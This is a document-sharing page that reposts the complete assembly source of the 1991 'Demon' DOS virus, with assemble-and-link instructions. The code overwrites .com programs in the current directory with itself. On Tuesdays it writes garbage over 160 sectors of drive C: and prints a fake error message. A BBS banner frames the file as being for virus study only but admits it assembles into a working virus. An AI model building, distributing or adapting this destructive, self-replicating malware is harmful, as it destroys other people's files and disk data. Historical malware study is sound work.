Demon

Published on February 2017 | Categories: Documents | Downloads: 43 | Comments: 0 | Views: 299
of 3
Download PDF   Embed   Report

Comments

Content

;========== demon virus ==================================== 22.09.91 ======== ; ; assemble and link with: tasm demon.vir ; tlink demon /x/t ; infect all .com programs in current directory with: demon ; ; !!! not on a tuesday !!! ; ;-------------- constants and structures tuesday search_rec fileattr filetime filedate filesize filename search_rec = struc db db dw dw dd db ends 2 21 dup (?) ? ? ? ? 13 dup (?) ; int 21h, ah=2ah ; directory search record ; reserved for dos ; file attribute ; packed file time ; packed file date ; long file size ; asciiz filename.ext

;-------------- demon virus segment virus segment assume cs:virus,ds:virus,es:virus,ss:virus org 0080h search_rec <> org = mov mov mov int nop jnc jmp call mov mov int nop jnc jmp jmp mov int cmp je mov int mov jmp mov 0100h virus_end - demon dx,offset all_com ah,4eh cx,110bh 21h infect short check_day replicate dx,offset dta ah,4fh 21h next_file short check_day infect ah,2ah 21h al,tuesday thrash_drive ah,4ch 21h counter,0 write_sectors al,drive_c ; disk transfer area ; virus entry point ; virus size = 272 bytes ; find first .com file, ; including hidden/system

dta demon: virus_size

; abort if no files found ; overwrite first 272 bytes ; find next .com file, ; go check day if none found ; else repeat

infect:

next_file: check_day:

; get dos date, check day ; tuesday ? ; if yes, thrash drive c: ; else exit to dos ; overwrite first 160 sectors ; of drive c: with garbage ; error: doesn't work !

thrash_drive: write_sectors:

show_msg:

mov mov mov int inc cmp je jne mov mov int mov int mov mov int mov nop xor mov int nop mov int nop jc mov mov int nop mov mov mov mov mov int nop mov mov mov int mov int nop mov mov mov int retn db dw dw dw db db dw

cx,160 dx,0 bx,0 26h counter counter,10 show_msg write_sectors ah,09h dx,offset virus_msg 21h ah,4ch 21h dx,offset dta.filename ax,4300h 21h com_attr,cx cx,cx ax,4301h 21h ax,3d02h 21h check_day bx,ax ax,5700h 21h com_time,cx com_date,dx dx,offset demon ah,40h cx,virus_size 21h ax,5701h dx,com_date cx,com_time 21h ah,3eh 21h dx,offset dta.filename cx,com_attr ax,4301h 21h '*.com',0 0 0 0 0 2 0

; ; ; ;

al=c:, cx=160 sectors dx=highest sector in drive ! ds:bx=start of psp area overwrite sectors

; repeat 10 times ; show a fake error message ; and exit to dos

replicate:

; save file attribute

; unprotect the .com file ; in case it's read-only ; open .com file for r/w, ; abort on error ; bx = file handle ; save file date and time

; overwrite first 272 bytes ; of .com program file ; with the virus code ; restore file date and time

; close the file ; restore file attribute

all_com com_date com_time com_attr counter drive_c

; ; ; ; ; ;

dir search specification packed .com program date packed .com program time .com program file attribute used when thrashing drive c: int 26h c: drive number

copyright virus_msg virus_end virus

db dw db label ends end

'demonhyak viri x.x (c) by cracker jack 1991 (ivrl)' 0 10,13,'error eating drive c:',10,13,'$' byte demon ; virus code+data end

;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=; ; -=] p e r f e c t c r i m e [=; ; -=] +31.(o)79.426o79 [=; ; -=] [=; ; -=] for all your h/p/a/v files [=; ; -=] sysop: peter venkman [=; ; -=] [=; ; -=] +31.(o)79.426o79 [=; ; -=] p e r f e c t c r i m e [=; ; -=][][][][][][][][][][][][][][][=; ; ; ; *** not for general distribution *** ; ; ; ; this file is for the purpose of virus study only! it should not be passed ; ; around among the general public. it will be very useful for learning how ; ; viruses work and propagate. but anybody with access to an assembler can ; ; turn it into a working virus and anybody with a bit of assembly coding ; ; experience can turn it into a far more malevolent program than it already ; ; is. keep this code in responsible hands! ; ; ; ;****************************************************************************;

Sponsor Documents

Or use your account on DocShare.tips

Hide

Forgot your password?

Or register your new account on DocShare.tips

Hide

Lost your password? Please enter your email address. You will receive a link to create a new password.

Back to log-in

Close